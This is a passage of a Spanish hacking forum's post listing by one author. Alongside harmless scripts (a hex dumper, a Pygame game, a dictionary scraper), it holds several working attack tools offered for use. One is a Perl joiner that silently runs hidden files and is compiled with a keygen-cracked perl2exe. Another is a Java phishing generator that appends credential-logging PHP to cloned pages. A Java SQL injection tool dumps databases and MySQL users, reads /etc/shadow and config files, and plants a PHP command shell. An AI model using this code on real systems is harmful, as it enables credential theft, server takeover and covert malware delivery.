print NOMBRE_DOS $test_dos;                # Lo mismo pero con el otro archivo
close NOMBRE_DOS;

Ya casi terminamos , lo que nos falta ahora es cargar los archivos al mismo tiempo de la siguiente forma :

Código: perl


my $comando1 = threads->new( \&uno );      # thread para cargar el archivo
my $comando2 = threads->new( \&dos );      # thread para cargar el otro archivo

$comando1->join();                         # empezamos
$comando2->join();                         # lo mismo

sub uno {    # funcion para cargar el primer archivo
    cargar_hide($nombre_uno);
}

sub dos {    #funcion para cargar el segundo archivo
    cargar_hide($nombre_dos);
}

sub cargar_hide {    # nombre de la funcion marcada anteriormente

    my $job = Win32::Job->new;

    $job->spawn( "cmd", qq{cmd /C $_[0]}, { no_window => "true" } )
      ;              # cargamos el archivo de forma oculta
    $ok = $job->run("30");

}

Con eso terminanos el archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

0x03 : Compilacion

Esto es lo mas importante , porque es para pasar el script You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a exe , entonces retomamos el archivo descomprimido y vemos que tenemos un directorio llamado "PERL2EXE" dentro de el tenemos un archivo llamado keygen lo cargamos y llenamos los datos que nos pide con cualquier cosa , cuando nos devuelva el supuesto serial cargamos perl2exe de la siguiente forma "perl2exe -register" , pegamos el serial y le damos enter , despues de eso si todo salio bien tendremos perl2exe a nuestro placer.

Entonces para compilar el script hacemos lo siguiente :

Código: perl


perl2exe -icon=imagen.ico -gui joiner.pl

El archivo imagen.ico lo encontraran en el archivo descomprimido y sirve para darle algo de realismo a la supuesta imagen que nos muestra a coraje el perro cobarde , honestamente ni un ciego caeria en tal absurdo intento de joiner pero solo lo hice para dejar la idea como hacerlo en perl xDD.

Algo importante a mencionar es que el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no funciona como queremos pero cuando lo pasamos a exe anda bien me refiero a que el tema de la consola molesta se borra en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y no se muestra ningun archivo pero cuando lo pasamos a exe con perl2exe anda todo de maravilla.

0x04 : Herramientas y Codigos finales

El archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Eso seria todo , cualquier sugerencia para mejorar la idea diganla.

#202

Perl / [Perl] HexNow 0.1

Marzo 09, 2013, 01:42:58 PM

Un simple script para convertir el codigo de un archivo en hexadecimal , muy util para un proyecto que tengo en mente.
El script es una traduccion a perl del famoso programa You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login hecho por hecky neobits.

El codigo :

Código: perl


#!usr/bin/perl
#HexNow 0.1
#Coded By Doddy H
#Script based in getbytes.py made by hecky neobits
#Thanks to hecky neobits & explorer(perlenespanol)

use Getopt::Long;
use File::Basename;
use Cwd;

chdir( getcwd() );

GetOptions(
    "hex=s"      => \$hex,
    "each=s"     => \$hexeach,
    "output=i"   => \$output,
    "savefile=s" => \$savefile
);

head();

if ($hex) {

    my $code_final;

    if ($hexeach) {

        my $st = unpack "H*", getcontent($hex);
        my $reco;

        for ( my $num = 0 ; $num <= length($st) - 1 ; $num += $hexeach ) {
            my $final = substr $st, $num, $hexeach;
            $reco .= $final . "\n";
        }

        $code_final = $reco;

    }
    else {
        $code_final = unpack "H*", getcontent($hex);
    }

    if ( $output eq "1" ) {

        print "\n\n[+] Encoding ....\n";

        print "\n[Start]\n\n";
        print $code_final;
        print "\n\n[End]\n";

    }

    if ($savefile) {
        savefile( $savefile, $code_final );
        print "\n[+] Result generated in : $savefile\n";
    }
    else {
        my $div = basename($hex);
        if ( $div =~ /(.*)\.(.*)/ ) {
            my $listo = $1 . "_hex.txt";
            savefile( $listo, $code_final );
            print "\n[+] Result generated in : $listo\n";
        }
    }

    copyright();

}

sub head {
    print qq(

             _____ 
      ,----/,--.   `. 
     /    '. `-'     \         Program Name : HexNow 
     | ____ \      '`|_        Version : 0.1
     \'.--._/` _     \ '.       Author : Doddy H
          /'-|/ \|`\|-`  \       Script based in getbytes.py made by hecky neobits  
         /   /       \   |     Thanks to hecky neobits
         |  ;    '`  |  .' 
         '. |;;      ;  / 
          \ \ ;     / ,'        Examples :
           ;--,   .,--, 
        __||=|=|./|=|=||___   perl hexnow.pl -hex imagen.jpg
          `'-'-'  `-'-'`      perl hexnow.pl -hex imagen.jpg -each 5 
      ______________________  perl hexnow.pl -hex imagen.jpg -output 1
          /'/ /  \  \ \          perl hexnow.pl -hex imagen.jpg -savefile test.txt
         / '.';  ; \ ' \ 
        '-/   | ; | ; \-' 
          \_| |   | |_/        The End ? 
            `-'\_/`-' 

);
}

sub copyright {
    print "\n(C) Doddy Hackman 2013\n";
    exit(1);
}

sub getcontent {

    open( FILE, $_[0] );
    binmode(FILE);
    my @lines = <FILE>;
    close FILE;

    $code = join "", @lines;
    return $code;

}

sub savefile {

    if ( -f $_[0] ) {
        unlink( $_[0] );
    }

    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1];
    close SAVE;
}

#The End ?

#203

Python / Mi primer juego en Pygame : UrbanWar

Febrero 20, 2013, 09:15:37 PM

Bue , recien acabo de terminar mi primer juego en Pygame , para hacerlo me base en el famoso juego Rock Blaster hecho por Jeff Walters.
El juego trata de sobrevivir 1 minuto en un barrio peligroso , comienzan a llover ladrones armados por todos lados y el protagonista tiene una M4 con municion infinita.
A grandes rasgos el juego esta basado en la vida real solo que en este caso no todos tenemos una M4 xDDD.

Una imagen del juego :

EL codigo :

Código: python


#!usr/bin/python
#UrbanWar 0.1
#Coded By Doddy H in the year 2013
#My first game in Pygame
#Based in the game Rock Blaster made by Jeff Walters
#Thanks to Jeff Walters

import pygame
import sys,os,time
from pygame.locals import *
import random

tiempoportiro = 1
 
class theboss(pygame.sprite.Sprite):
 
 def __init__(self,esto):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/ladron.gif")
  self.rect = self.image.get_rect( center = (random.randint(0,860),0))
  self.cada = esto
 
 def update(self):
  self.rect.move_ip(self.cada,3)
  
class protagonista(pygame.sprite.Sprite):
 
 def __init__(self):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/protagonista.gif")
  self.rect = self.image.get_rect(center = (860,640))
 
 def update(self):
  global tiempoportiro
  if pygame.key.get_pressed()[K_LEFT]:
   self.rect.move_ip(-5,0)
  if pygame.key.get_pressed()[K_RIGHT]:
   self.rect.move_ip(5,0)
  if pygame.key.get_pressed()[K_SPACE] and tiempoportiro <= 0:
   pygame.mixer.Sound("archivos/disparo.wav").play()
   tiempoportiro = 25
   cartucho(self.rect.midtop)
  tiempoportiro -= 1
  self.rect.clamp_ip(Rect(0,0,860,640))
 
class chau(pygame.sprite.Sprite):
	
 def __init__(self, actor):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/explo.gif")
  self.rect = self.image.get_rect(center=actor.rect.center)
  self.tie = 10
 
 def update(self):
  self.tie = self.tie - 2
  if self.tie <= 0:
   self.kill()
   
class cartucho(pygame.sprite.Sprite):
 
 def __init__(self,toyaca):
 
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/bala.gif")
  self.rect = self.image.get_rect(midbottom = toyaca)

 def update(self):
  self.rect.move_ip(-30,-50)
  if not Rect(0,0,860,640).contains(self.rect):
   self.kill()
  
pygame.init()

mil = 0 
theboss_cadacuanto = 30

cro = pygame.time.Clock()
 
pantalla = pygame.display.set_mode((860,640),0,32)
#pantalla = pygame.display.set_mode((860,640),FULLSCREEN) # FULLSCREEN

fondo = pygame.image.load("archivos/callejon.jpg")
pygame.display.set_caption("UrbanWar 0.1")
pygame.mouse.set_visible(False)

protagonistamas = pygame.sprite.Group()

protagonista.mas = protagonistamas
protagonista = protagonista()
 
thebossmas = pygame.sprite.Group()
theboss.mas = thebossmas

cartuchomas = pygame.sprite.Group()
cartucho.mas = cartuchomas
 
chaumas = pygame.sprite.Group()
chau.mas = chaumas 
 
mostrar = pygame.font.Font("archivos/FreeSansBold.ttf",36)

pygame.mixer.Sound("archivos/menu.wav").play()
men = pygame.image.load("archivos/menu.jpg")
pantalla.blit(men,(0,0))
pygame.display.update()
time.sleep(9)

while 1:
            
 mil += cro.tick()
 casi = mil/1000
 casi = 60 - casi
 
 if casi == 0:
  win = pygame.image.load("archivos/mina.jpg")
  pantalla.blit(win,(0,0))
  pygame.display.update()
  time.sleep(10)
  sys.exit(1) 
 
 tiempoquefalta = mostrar.render("Remaining Time : "+str(casi),True,(255,0,0))             
 pantalla.blit(tiempoquefalta,(500,20))
 pygame.display.update()
 
 pantalla.blit(fondo,(0,0))
 
 protagonistamas.draw(pantalla)
 protagonistamas.update()
 thebossmas.draw(pantalla)
 thebossmas.update()
 cartuchomas.draw(pantalla)
 cartuchomas.update()
 chaumas.draw(pantalla)
 chaumas.update()

 if theboss_cadacuanto:
  theboss_cadacuanto = theboss_cadacuanto - 1
 else:
  asteroid = theboss(random.randint(-6,5))
  theboss_cadacuanto = 20
  
 for asteroid in pygame.sprite.groupcollide(cartuchomas,thebossmas,1,1): 
  pygame.mixer.Sound("archivos/muerte.wav").play()
  chau(asteroid)
   
 for asteroid in pygame.sprite.spritecollide(protagonista,thebossmas,1):
  pygame.mixer.Sound("archivos/muerte.wav").play()
  chau(protagonista)
  protagonista.kill()
  
  over = pygame.image.load("archivos/gameover.jpg")
  pantalla.blit(over,(0,0))
  pygame.display.update()
  time.sleep(10)
  sys.exit(1)

 for event in pygame.event.get():
  if event.type == QUIT:
   break
  cap = pygame.key.get_pressed();
  if cap[K_ESCAPE]:
   sys.exit(1)

 pygame.display.update()

#The End ?

Para bajar el codigo con las imagenes o el juego compilado lo pueden hacer de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

#204

Java / [Java] Diccionario Online 0.1

Febrero 12, 2013, 02:07:14 PM

Practicando en este lenguaje hice este simple diccionario online , solo ponen una palabra y el programa les devuelve el significado (si es que lo encuentra xDD)

Código: java


//Diccionario Online 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.*;
import java.io.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;

        String palabra;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == Diccionario Online 0.1 == --\n\n");
        System.out.println("[+] Palabra : ");
        palabra = host.nextLine();

        code = toma("http://es.thefreedictionary.com/" + palabra);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("<div class=runseg><b>1 </b>&nbsp; (.*?)[.:<]");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n" + dos.group(1));
        } else {
            System.out.println("\n[-] No se encontro el significado");
        }

        System.out.println("\n\n-- == Coded By Doddy H == --\n\n");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();
    }
}

//The End ?

#205

Java / [Java] Phishing Gen 0.1

Febrero 12, 2013, 02:06:20 PM

Tratando de practicar este lenguaje hice este simple generador de fakes.

Código: java


//Phishing Gen 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String iny;
        String pagina;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == Phishing Gen 0.1 == --\n\n");
        System.out.println("[+] Pagina : ");
        pagina = host.nextLine();

        iny = "<?php $file = fopen('dump.txt','a');foreach($_POST as $uno => $dos) {fwrite($file, $uno.'='.$dos.'\r\n');}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres.'='.$cuatro.'\r\n');}fclose($file); ?>";

        code = toma(pagina);

        savefile("fake.php", code + iny);

        System.out.println("\n[+] Fake Ready");

        System.out.println("\n\n-- == Coded By Doddy H == --\n\n");
    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();
    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }
}

//The End ?

#206

Zona Webmaster / [EXHIBICIÓN] Mi primer template : GreenKaker

Febrero 03, 2013, 11:04:53 PM

Este es mi primer template , lo hice porque queria hacer un diseño parecido que vi en internet si quieren verlo lo puede hacer de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , es bien basico solo hice el index.
Pueden bajar el template desde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Una imagen

Cualquier sugerencia diganla para mejorar.

#207

Java / [Java] SQLI Scanner 0.2

Enero 21, 2013, 09:33:17 PM

Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile

Todo se guarda en logs ordenados

Un ejemplo de uso :

Código: java



-- == SQLI Scanner 0.2 == --


[+] Page : 
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

-- == OPTIONS == --

--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit

[Option] :
10

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished

El codigo es el siguiente :

Código: java


// -- == -- == -- == ---- ==
// SQLI Scanner 0.2       ||
// -- == -- == -- == ---- ==
// (C) Doddy Hackman 2013 ||
// -- == -- == -- == ---- == 

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String target;
        Scanner host = new Scanner(System.in);

        installer();

        System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
        System.out.println("[+] Page : ");
        target = host.nextLine();
        scan(target);

//schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
//getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
//getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
//fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
//intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

    }

    private static void manejo(String urla) throws Exception {

        while (true) {
            System.out.println("\n-- == OPTIONS == --\n");
            System.out.println("--== information_schema.tables ==--");
            System.out.println("[1] : Show tables");
            System.out.println("[2] : Show columns");
            System.out.println("[3] : Show DBS");
            System.out.println("[4] : Show tables with other DB");
            System.out.println("[5] : Show columns with other DB");
            System.out.println("--== mysql.user ==--");
            System.out.println("[6] : Show users");
            System.out.println("--== Others ==--");
            System.out.println("[7] : Fuzzing files with load_file");
            System.out.println("[8] : Read a file with load_file");
            System.out.println("[9] : Dump");
            System.out.println("[10] : Informacion of the server");
            System.out.println("[11] : Create a shell with into outfile");
            System.out.println("[12] : Show Log");
            System.out.println("[13] : Exit");

            int op;
            Scanner host = new Scanner(System.in);
            System.out.println("\n[Option] :");
            op = host.nextInt();

            if (op == 1) {
                schematables(urla);
                continuar();
            } else if (op == 2) {

                String coler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                coler = a.nextLine();

                schemacolumns(urla, coler);
                continuar();

            } else if (op == 3) {
                getdbs(urla);
                continuar();
            } else if (op == 4) {

                String tabler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                tabler = a.nextLine();

                getablesbydb(urla, tabler);
                continuar();

            } else if (op == 5) {

                String dber;
                String tablerx;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                dber = a.nextLine();

                Scanner b = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                tablerx = a.nextLine();

                getcolbydb(urla, dber, tablerx);
                continuar();

            } else if (op == 6) {

                mysqluser(urla);
                continuar();

            } else if (op == 7) {

                fuzzfiles(urla);
                continuar();

            } else if (op == 8) {

                String ar;

                Scanner f = new Scanner(System.in);
                System.out.println("\n[+] File : ");
                ar = f.nextLine();

                openfile(urla, ar);
                continuar();

            } else if (op == 9) {

                String a;
                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                a = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Column 1 : ");
                b = n.nextLine();

                Scanner l = new Scanner(System.in);
                System.out.println("\n[+] Column 2 : ");
                c = l.nextLine();

                dumper(urla, a, b, c);

                continuar();

            } else if (op == 10) {

                details(urla);
                continuar();

            } else if (op == 11) {

                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Full Path Discloure : ");
                b = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Directory to test : ");
                c = n.nextLine();

                intofile(urla, b, c);
                continuar();

            } else if (op == 12) {

                String ruta;

                URL h = new URL(urla);

                ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                System.out.println("\n[+] Check logs in : " + ruta);
                continuar();

            } else if (op == 13) {
                System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                continuar();
                System.exit(1);
            } else {
                System.out.println("\n[-] Bad Option\n");
                continuar();
            }

        }
    }

    private static void continuar() throws Exception {
        System.out.println("\n[+] Finished\n");
        Scanner chau = new Scanner(System.in);
        chau.nextLine();
    }

    private static void installer() throws Exception {

        File crear = new File("logs");

        if (!crear.isDirectory()) {
            crear.mkdirs();
        }

    }

    private static void intofile(String urla, String fpd, String dir) throws Exception {

        String linea;
        String lugar;
        String lugardos;
        String webtest;
        String web1;
        String formandoweb;
        String code;

        linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
        lugar = fpd + "/cmd.php";
        lugardos = dir + "/cmd.php";

        URL h = new URL(urla);

        System.out.println("\n[+] Checking ...\n");

        webtest = "http://" + h.getHost() + lugardos;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", linea);
        formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

        code = toma(formandoweb);
        code = toma(webtest);

        uno = Pattern.compile("Mini Shell By Doddy");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[Shell UP] : " + webtest);
            savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
        } else {
            System.out.println("[-] Error");
        }

    }

    private static void openfile(String urla, String file) throws Exception {

        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        archivo = encodehex(file);

        web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

        System.out.println("\n[+] Reading ...\n");

        code = toma(web1);

        uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {

            System.out.println("[+] File Found : " + file);
            System.out.println("\n[Source Start]\n");
            System.out.println(dos.group(1));
            System.out.println("\n[Source End]\n");

            savefile(urla, "\r\n" + "[+] File Found : " + file);
            savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
            savefile(urla, dos.group(1));
            savefile(urla, "\r\n" + "[Source End]" + "\r\n");

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void fuzzfiles(String urla) throws Exception {

        String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", 